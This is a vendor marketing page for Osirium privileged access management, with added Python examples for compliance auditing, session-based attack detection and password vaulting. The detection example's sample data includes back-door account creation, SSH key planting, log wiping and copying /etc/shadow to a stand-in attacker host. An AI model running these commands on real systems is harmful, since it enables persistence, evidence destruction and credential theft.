Osirium Manages Privileged Users, Privileged Accounts and their Passwords, and allows for the Delegation of Privileged Tasks
The changing face of Cyber Security
Securing IT infrastructures used to be a much simpler problem: businesses managed their own IT infrastructure and secured their own perimeter using point security solutions such as firewalls, email gateways, VPNs and proxies. The bad guys were on the outside; simply put, the Internet was the “wild west” and all that organisations needed to do was circle the wagons to keep out their enemies.
However, in today’s hybrid-cloud era, the privileged insider and outsider have become interchangeable and the traditional idea of the security perimeter has dissolved. As a result, there has been an alarming increase in the number of Privileged Users, some of whom hold privileged powers far exceeding those needed to do their jobs.
These risks have huge potential for cyber-attack and corporate damage, because Privileged Accounts provide a “golden” path for anyone holding them to compromise data and remain undetected for long periods of time. Organizations can significantly reduce the threat of targeted attacks by proactively securing privileged accounts against Advanced Persistent Threat (APT) attack cycles. According to CyberSheath’s APT Research Report, privileged accounts are increasingly being used in advanced and targeted attacks to compromise organizations and steal data:
- The Compromise of Privileged Accounts is a Crucial Factor in 100% of Advanced Attacks
- Attacks That Use Privileged Accounts are More Difficult to Detect, Shut Down and Remediate
- Attacks That Exploit Privileged Accounts are More Damaging and Expensive
- Properly Secured Privileged Accounts Can Significantly Reduce APT Exposure
Privileged Accounts have become the most sought-after target. They enable attackers to erase their digital footprints, install back doors, erase logs and gain access to highly sensitive information without being detected. Protecting these accounts has become the most critical cyber-security issue of today.
Many high-profile breaches, including those at RSA and the US Chamber of Commerce, have involved the exploitation of privileged or administrator accounts. For example, the Mandiant report in February 2013 into Chinese cyber-attacks against 141 organisations around the world showed that 90% involved the takeover of privileged accounts.
Osirium has Enterprise Class Password Management as one of the three foundation components
What are Privileged Users and Privileged Accounts?
All IT infrastructures are operationally managed by skilled IT staff who, by virtue of function and/or seniority, have been given the use of Privileged Accounts with powers within the computer system that are significantly greater than those available to the majority of users.
These individuals are known as Privileged Users because they need increased configuration powers to install, deploy and maintain IT assets, as well as to create new user profiles and to add to or amend the powers and access rights of other existing users. It is these privileged powers which are becoming one of the most dangerous cyber-security threats in the corporate world. These risks are known as “Insider Threats”: Privileged Users with access to Privileged Accounts have the capacity to unleash huge damage on companies.
Osirium has Enterprise Class Privileged Account Lifecycle Management as one of the three foundation components
The facts about “Insider Threats”
- Over 50% of business leaders see their own employees as a bigger threat to cyber security than external attackers, according to the survey ‘Boardroom Cyber Watch 2013’.
- At Société Générale, a junior trader, Jerome Kerviel, used access rights retained from his former back-office role to carry out unauthorised trading, costing the company £3.6bn.
- The NatWest service outage of 2012 was brought about by a junior sysadmin deleting the previous night’s batch run.
Verizon’s Data Breach Investigations Report revealed that:
- 48% of data breaches were caused by insiders (up 26% on 2010), and 70% of all incidents were first detected and notified by a third party.
- PricewaterhouseCoopers says that 82% of the organisations it works with have insider issues and that 65% of those involved the abuse of privileged access.
- 86% of large enterprise organizations either do not know or have grossly underestimated the magnitude of their privileged account security problem, while more than half of them share privileged passwords internally, which only exacerbates the insider threat. Confidential data theft is often carried out by exploiting privileged account access; 65% of IT managers and C-level professionals believe that the majority of recent security attacks have involved this type of access.
- 48% of cyber-attacks originate from inside the organisation.
- 65% of insider issues involve the abuse of privileged access.
- 60% of organisations cannot associate every privileged user action with an individual.
- 70% of organisations make uncontrolled changes prior to audits.
- 90% of organisations still guess the identities of devices, risking high error rates and catastrophic failures.
- Two out of every three privileged accounts in organizations are either unknown or unmanaged.
To minimize the risk associated with these accounts, organizations need to identify where the accounts exist, control access to them, and monitor exactly what is being done with them. Implementing a privileged account security solution to automate these processes helps organizations enforce these controls while providing a clear audit trail for accountability and security. There are many types of “Insider” attack, both malicious and unintentional:
- System sabotage: This type of attack is malicious in nature and usually consists of a disgruntled employee destroying data or rendering an operating system or applications unusable in some way.
- Theft of assets or data: Usually malicious, this attack can be very difficult to identify and may be one of the most damaging overall.
- Introduction of “bad code”: An attack of this nature may be deliberate or accidental (for example, by haplessly using poor coding practices or purchasing bad code). It is usually attributed to developers or other IT professionals who have access to code or scripts used by an organization. One example is the logic bomb coded into a program by a rogue developer at Fannie Mae.
- Introduction of malware: This is an attack that may not be deliberate in nature; many malware infections are unintentional. The higher the user’s privileges are, however, the more devastating the attack can be.
- Unauthorized hardware and software: By introducing wireless access points, USB storage devices, and unapproved software into an organization, insiders may introduce new threats and vulnerabilities to the environment.
- Social engineering: It is often said that the weakest link in the chain of security is people, and by exploiting them, insiders can easily bypass policies and controls. Such attacks may range from the innocent (talking an administrator into installing a software package a user wants) to malicious (a help desk analyst talking a user out of her password to gain access to her files or, more dangerously, company data).
- Accidents: Even accidental incidents by insiders have the potential to cause tremendous damage.
What does Osirium do?
- Cyber Security Protection for Privileged Accounts
- Securing 3rd Party Access in Hybrid Cloud Infrastructures
- Automating Privileged Tasks to reduce Costs and Risks
- Privileged Compliance for Visibility and Accountability
Osirium Privileged Access Management (PAM) protects SysAdmin environments from privileged cyber-security threats by automating the password management lifecycle, so that Privileged Account credentials cannot be stolen or hijacked and passwords are never revealed to users during single sign-on, privilege assignment, or the provisioning and de-provisioning of devices.
Osirium further strengthens security by removing the reliance on shared or group accounts, and with it the complexity and confusion that arise from managing shared passwords, by creating a unique, personalised account for each user on each end system with the strongest passwords possible.
Osirium also removes the possibility of bypassing it and reaching the infrastructure over direct connections, since every privileged connection request has to pass via Osirium. For this to hold in practice the target devices must accept privileged connections only from the Osirium server, enforced by firewall rules or access lists on the devices themselves; a proxy that can be routed around protects nothing. In emergencies these accounts can still be accessed and used manually, and the log files contain individual account information, making it simple to identify exactly who has done what, and when, on end systems.
Osirium helps its customers drive down overhead costs by automating Privileged Tasks and delegating them to other teams, such as the Help Desk, which makes better use of available resources and significantly reduces the risk of human error. Furthermore, Blueprints can be created that set out the required settings for, say, PCI compliance, which allows Osirium to schedule audits that identify compliance gaps and then remediate the devices falling short, helping organisations proactively meet and, more importantly, maintain compliance.
Session shadowing and recording is also available. It acts as a general deterrent to malicious practitioners and enables device audit reviews, change management control and assessment, faster fault resolution and, ultimately, irrefutable evidence of privileged activity on devices and applications.
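The Blueprint idea above (a declared set of required settings, a scheduled audit that reports gaps, and remediation of the devices that fall short) is easiest to see as code. The following is an added example written for this page, not Osirium’s own code or template format: the setting names, the operators and the two device configurations are constructed, and the PCI DSS limits are the well-known requirement 8 values (15-minute idle timeout, lockout after six attempts for 30 minutes, seven-character minimum, 90-day change), quoted for illustration rather than as compliance advice.

```python
from copy import deepcopy

# A blueprint is a list of (setting, operator, required value) rules. The limits
# below follow PCI DSS requirement 8 and are illustrative; check them against the
# edition of the standard in force. Setting names are constructed for this example.
PCI_BLUEPRINT = [
    ("ssh.protocol_version", "==", 2),
    ("ssh.password_authentication", "==", False),
    ("session.idle_timeout_minutes", "<=", 15),
    ("auth.lockout_attempts", "<=", 6),
    ("auth.lockout_minutes", ">=", 30),
    ("password.min_length", ">=", 7),
    ("password.max_age_days", "<=", 90),
    ("logging.remote_syslog", "==", True),
]

OPS = {
    "==": lambda actual, wanted: actual == wanted,
    "<=": lambda actual, wanted: actual <= wanted,
    ">=": lambda actual, wanted: actual >= wanted,
}

# Constructed device configurations, as a vault would read them back from the device.
DEVICES = {
    "fw-edge-01": {
        "ssh.protocol_version": 2, "ssh.password_authentication": True,
        "session.idle_timeout_minutes": 60, "auth.lockout_attempts": 10,
        "auth.lockout_minutes": 5, "password.min_length": 6,
        "password.max_age_days": 365, "logging.remote_syslog": False,
    },
    "db-core-02": {
        "ssh.protocol_version": 2, "ssh.password_authentication": False,
        "session.idle_timeout_minutes": 10, "auth.lockout_attempts": 5,
        "auth.lockout_minutes": 30, "password.min_length": 12,
        "password.max_age_days": 60, "logging.remote_syslog": True,
    },
}


def audit_device(config: dict, blueprint=PCI_BLUEPRINT) -> list[dict]:
    """Return one gap per rule the device fails; a missing setting is a gap too."""
    gaps = []
    for setting, op, wanted in blueprint:
        actual = config.get(setting)
        if actual is None or not OPS[op](actual, wanted):
            gaps.append({"setting": setting, "actual": actual, "required": f"{op} {wanted}"})
    return gaps


def remediate(config: dict, blueprint=PCI_BLUEPRINT) -> tuple[dict, list[str]]:
    """Return a corrected copy plus the list of settings changed. For <= and >= rules
    the boundary value is applied (the least disruptive compliant choice); a stricter
    value already in place is left alone."""
    fixed = deepcopy(config)
    changed = []
    for setting, op, wanted in blueprint:
        actual = fixed.get(setting)
        if actual is None or not OPS[op](actual, wanted):
            fixed[setting] = wanted
            changed.append(setting)
    return fixed, changed


def scheduled_audit(devices: dict, blueprint=PCI_BLUEPRINT) -> dict:
    """The job a scheduler would run: audit every device and report its gap count."""
    return {name: len(audit_device(cfg, blueprint)) for name, cfg in devices.items()}
```

Running `scheduled_audit(DEVICES)` reports seven gaps on `fw-edge-01` and none on `db-core-02`; `remediate` on the first device changes exactly those seven settings and a re-audit of the result is clean. Remediation is deliberately separated from auditing so that the report can be reviewed (and change-controlled) before anything is pushed to a device.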
Cyber Security Protection for Privileged Accounts
Attack Vector 1 – Stopping unauthorised access directly into privileged accounts residing in applications and on devices.
Systems administrators, power users and generic accounts have their passwords compromised by unauthorised users and intruders because the passwords are weak or have become commonly known across multiple systems. Osirium provides a single protective layer between the estate and all users: the only way to access the estate is by signing in to Osirium. Even a brute-force attack on an Osirium-managed device is unlikely to succeed, because of the rolling, randomly generated passwords Osirium puts in place. Osirium therefore eliminates this aspect of the attack surface, namely direct access into privileged accounts.
Attack Vector 2 – Removing powers from privileged users not required for their role.
“48% of data breaches are caused by insiders”, and 22% of those insider breaches were enabled by inappropriate or outdated privileged user access rights. More specifically, these ‘incorrect rights’ breaches were categorised by CERT (the Computer Emergency Response Team at Carnegie Mellon University) into 1) over-privileged users, able to make changes outside their role and authority, and 2) unrevoked permissions, for users no longer in the same role or no longer with the company. Osirium maps each user to specific role-based accounts in the application or device, so users can only perform activities for which they have express authorisation. If their role changes or they leave the organisation, no matter how many accounts they had access to, only one place needs to be updated, and that is in Osirium.
Osirium therefore eliminates this aspect of the attack surface – over-privileged and legacy accounts.
Attack Vector 3 – Deterring legitimate users from abusing their role.
The balance of insider breaches is down to users with valid rights. Of these attackers, those motivated by financial gain, revenge or business advantage probably do not want to be caught, and those motivated by recognition, curiosity or ideology probably do not care.
Osirium audits everything the user does, down to a video record of mouse movements and keystrokes. A bright red banner across the screen provides a permanent reminder that, ‘for reasons of compliance’, session recording is active. Osirium eliminates this aspect of the attack surface, i.e. getting away with an act of vandalism, sabotage or theft. Those with more fundamentalist motives are harder to stop, but Osirium can minimise the damage.
Attack Vector 4 – Containing a breach when it does happen.
With the best protection in place, a breach must still be viewed as a possibility, however unlikely, and when one does occur the priority shifts from prevention to investigation and remediation. Osirium can notify on any device or application access, together with all activity recorded during that session, in near real time, providing information for review and enabling informed decisions on remediation and recovery. Osirium therefore helps organisations minimise the damage of a breach by quickly closing the attack window and reducing data loss, while providing the visibility and intelligence needed to mitigate the potential damage. The quicker an attack window is closed, the less data can be stolen and the fewer customers are affected.
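What “notify in near real time on recorded activity” means in practice is detection logic run over the session record as it is captured. The block below is an added example, not Osirium’s detection engine: it evaluates a handful of constructed keystroke lines (a benign daytime database session and an off-hours session that creates a UID-0 account, plants an SSH key, wipes logs and copies `/etc/shadow`, the footprint-erasing and back-door activity described earlier on this page) against a small illustrative rule set, and decides which session should be terminated so the attack window closes. The rules, the working-hours policy and the event format are all assumptions made for the example.

```python
import re
from datetime import datetime

# Constructed session-recording events: (timestamp, user, device, keystroke line).
SESSION_EVENTS = [
    ("2024-01-01T09:02:11Z", "alice", "db-core-02", "sudo systemctl status postgresql"),
    ("2024-01-01T09:03:40Z", "alice", "db-core-02", "tail -n 50 /var/log/postgresql/postgresql.log"),
    ("2024-01-01T22:14:05Z", "bob", "fw-edge-01", "useradd -o -u 0 svc_backup"),
    ("2024-01-01T22:14:30Z", "bob", "fw-edge-01", "cat /tmp/key.pub >> /root/.ssh/authorized_keys"),
    ("2024-01-01T22:15:02Z", "bob", "fw-edge-01", "rm -rf /var/log/auth.log; history -c"),
    ("2024-01-01T22:16:10Z", "bob", "fw-edge-01", "scp /etc/shadow attacker@203.0.113.9:/tmp/"),
]

# Illustrative patterns for the activities the page warns about: erasing logs and
# shell history, creating back-door accounts, planting keys, pulling credentials.
RULES = [
    ("log-tampering", re.compile(r"\b(rm|shred|truncate)\b.*/var/log|\bhistory\s+-c\b|unset\s+HISTFILE")),
    ("backdoor-account", re.compile(r"\buseradd\b.*-u\s*0\b|\busermod\b.*\b(sudo|wheel)\b")),
    ("ssh-key-persistence", re.compile(r"authorized_keys")),
    ("credential-access", re.compile(r"/etc/shadow|\.ssh/id_[a-z0-9]+\b")),
]
WORKING_HOURS = range(7, 19)    # constructed policy: 07:00 to 18:59 UTC is expected use


def detect(events, rules=RULES) -> list[dict]:
    """Evaluate each recorded keystroke line as it arrives and return an alert for
    every event that trips a pattern or falls outside working hours."""
    alerts = []
    for ts, user, device, line in events:
        hour = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").hour
        reasons = [name for name, rx in rules if rx.search(line)]
        if hour not in WORKING_HOURS:
            reasons.append("off-hours")
        if reasons:
            alerts.append({"time": ts, "user": user, "device": device,
                           "command": line, "reasons": reasons})
    return alerts


def sessions_to_terminate(alerts, threshold: int = 2) -> list[tuple[str, str]]:
    """Close the attack window: a session that trips two or more distinct content
    rules is flagged for termination and credential rotation. Off-hours access on
    its own is only notified, not acted on, to avoid cutting off legitimate on-call work."""
    seen: dict[tuple[str, str], set] = {}
    for alert in alerts:
        key = (alert["user"], alert["device"])
        seen.setdefault(key, set()).update(r for r in alert["reasons"] if r != "off-hours")
    return sorted(key for key, rules_hit in seen.items() if len(rules_hit) >= threshold)
```

On the sample events `detect` raises four alerts, all for bob’s session on `fw-edge-01`, and `sessions_to_terminate` returns that one session. Because the events carry the individual user name that the personalised accounts provide, the alert already answers “who” without any further correlation; a single noisy match (one rule, or off-hours alone) is notified but does not terminate anything.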
Securing 3rd Party Access in Hybrid Cloud Infrastructures
Whether the organisation’s infrastructure is on-premise, in the cloud or a hybrid mix of both, Osirium’s Privileged Management solution provides quick, secure access to all network and security devices through an automated single sign-on process via the Osirium Server, which proxies connections to the target system.
Osirium PAM is an agentless solution requiring no additional software to be installed, configured or maintained on target devices and applications. This reflects one of the critical design principles defined at its inception: minimising disruption to working practices and simplicity of deployment.
Osirium PAM has been architected to support devices and applications from many different vendors and already supports a large number of diverse vendor equipment and applications. Extending support to additional devices, servers or applications is a simple matter of creating new XML knowledge templates; clients are already creating their own templates, with full support and backing from the Osirium support team.
Each SysAdmin uses an Osirium Desktop Client, which gives them access to all the systems they are required to manage, wherever those reside in the infrastructure. The Desktop Client provides a list of the devices the SysAdmin is allowed to access and a list of the tasks they have been delegated to perform. There is also a “Google-like” search tool for rapid identification of the devices requiring privileged access. Osirium automatically creates unique local role-based accounts for each administrator on each device or application requiring access. These accounts are personalised with the administrator’s logon details and the permission levels they hold. Personalised access on each device also means that users cannot side-step or piggy-back to other devices, because that particular account is not valid there.
When connecting to devices, Osirium PAM proxies the connection and automatically injects the user’s credentials to perform a single sign-on. As a result, nobody ever sees or knows the passwords on any end device, so those credentials can no longer be phished, shoulder-surfed, written down or reused. The credentials now exist only in Osirium, which makes the Osirium server itself the asset to harden and monitor most carefully.
Conversely, whenever an administrator needs to be removed, Osirium automatically connects to all of that administrator’s devices and removes the account, eliminating any possibility of dormant or legacy accounts remaining on the devices to which the administrator had access.
SuperAdmins can quickly and easily manage SysAdmin accounts, usernames/passwords and privilege levels in real time across multiple network devices, enabling management to enforce policy-based access controls. This eliminates the risk of unauthorised users obtaining shared and unsecured passwords, by removing the need for SysAdmins to remember static passwords for every device. Password renewal can be automated at specific time intervals for specific types of end system, or after specific events have taken place. Similarly, Osirium’s approach to session recording and compliance audits is granular and based on Osirium profiles; it can be configured to align with the ‘least privilege’ deployment model rather than operating a ‘catch-all’ across all devices and users.
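The mechanisms described across this page (one personalised local account per administrator per device, a randomly generated password that is injected at sign-on and never shown to the user, renewal on a schedule, tasks restricted to the user’s role, and a single leaver action that removes the account from every device, all with an audit trail naming the individual) fit together into one small model. The following is an added example written for this page to show that lifecycle end to end; it is not Osirium’s code, and the role names, task names, device names, 24-hour rotation interval and in-memory account store are all assumptions. Device operations are modelled as dictionary updates where a real vault would log in with its own management credential and run the device’s account commands.

```python
import secrets
import string
from dataclasses import dataclass
from datetime import datetime, timedelta

# 94 printable ASCII symbols; 32 of them give about 210 bits of entropy.
ALPHABET = string.ascii_letters + string.digits + string.punctuation

# Hypothetical per-role task allow-list (illustrative names, not Osirium's):
# the help desk is delegated a single task, full administrators get the rest.
ROLE_TASKS = {
    "admin": {"shell", "restart_service", "reset_user_password"},
    "helpdesk": {"reset_user_password"},
}


def generate_password(length: int = 32) -> str:
    """Random device password from a CSPRNG; it is never shown to a human."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


@dataclass
class ManagedAccount:
    device: str
    username: str      # personalised local account, e.g. alice_admin
    role: str
    password: str      # lives only inside the vault
    rotated_at: datetime


class PrivilegedVault:
    """One local account per (user, device); passwords injected at connect time,
    rotated on schedule, tasks restricted by role, leavers removed everywhere."""

    def __init__(self, rotation_interval: timedelta = timedelta(hours=24)):
        self.accounts: dict[tuple[str, str], ManagedAccount] = {}
        self.audit: list[dict] = []          # who did what, where and when
        self.rotation_interval = rotation_interval

    def _log(self, now, user, device, action, detail):
        self.audit.append({"time": now.isoformat(), "user": user,
                           "device": device, "action": action, "detail": detail})

    def provision(self, user, device, role, now) -> str:
        """Create the per-user local account. Modelled as a dictionary entry; a real
        vault would log in with its own credential and run the device's commands."""
        acct = ManagedAccount(device, f"{user}_{role}", role, generate_password(), now)
        self.accounts[(user, device)] = acct
        self._log(now, user, device, "provision", acct.username)
        return acct.username

    def rotate(self, user, device, now) -> None:
        acct = self.accounts[(user, device)]
        acct.password = generate_password()
        acct.rotated_at = now
        self._log(now, user, device, "rotate", acct.username)

    def run_task(self, user, device, task, now) -> str:
        """Single sign-on: the vault injects the device password and runs only a
        task allowed for the role. Returns a session handle, never the password."""
        acct = self.accounts.get((user, device))
        if acct is None:
            self._log(now, user, device, "denied", task)
            raise PermissionError(f"{user} holds no account on {device}")
        if task not in ROLE_TASKS[acct.role]:
            self._log(now, user, device, "denied", task)
            raise PermissionError(f"{task!r} is outside the {acct.role} role")
        if now - acct.rotated_at >= self.rotation_interval:
            self.rotate(user, device, now)           # scheduled renewal
        self._log(now, user, device, "session", f"{acct.username}:{task}")
        return f"{acct.username}@{device}:{task}"

    def deprovision_user(self, user, now) -> list[str]:
        """Leaver or role change: one action removes the account from every device."""
        devices = sorted(d for (u, d) in self.accounts if u == user)
        for device in devices:
            username = self.accounts.pop((user, device)).username
            self._log(now, user, device, "deprovision", username)
        return devices


def demo() -> dict:
    """Provision, run tasks, hit a denial, trigger rotation and remove a leaver on
    constructed devices; returns the observations."""
    t0 = datetime(2024, 1, 1, 9, 0)
    vault = PrivilegedVault()
    vault.provision("alice", "fw-edge-01", "admin", t0)
    vault.provision("alice", "db-core-02", "admin", t0)
    vault.provision("bob", "db-core-02", "helpdesk", t0)
    out = {"alice_session": vault.run_task("alice", "fw-edge-01", "shell", t0),
           "bob_session": vault.run_task("bob", "db-core-02", "reset_user_password", t0)}
    try:                                        # help desk must not get a shell
        vault.run_task("bob", "db-core-02", "shell", t0)
        out["bob_shell_denied"] = False
    except PermissionError:
        out["bob_shell_denied"] = True
    before = vault.accounts[("alice", "fw-edge-01")].password
    vault.run_task("alice", "fw-edge-01", "shell", t0 + timedelta(hours=25))
    out["rotated"] = vault.accounts[("alice", "fw-edge-01")].password != before
    out["removed"] = vault.deprovision_user("alice", t0 + timedelta(days=2))
    out["audit_actions"] = [(e["user"], e["action"]) for e in vault.audit]
    return out
```

`demo()` shows the properties the page claims: the help desk user gets only the task delegated to that role, the 25-hour gap between alice’s sessions triggers a password renewal that she never sees, and removing alice is a single call that returns both devices her account was deleted from. Every event, including the denial, lands in the audit list against an individual user name, so a shared account never appears in the trail.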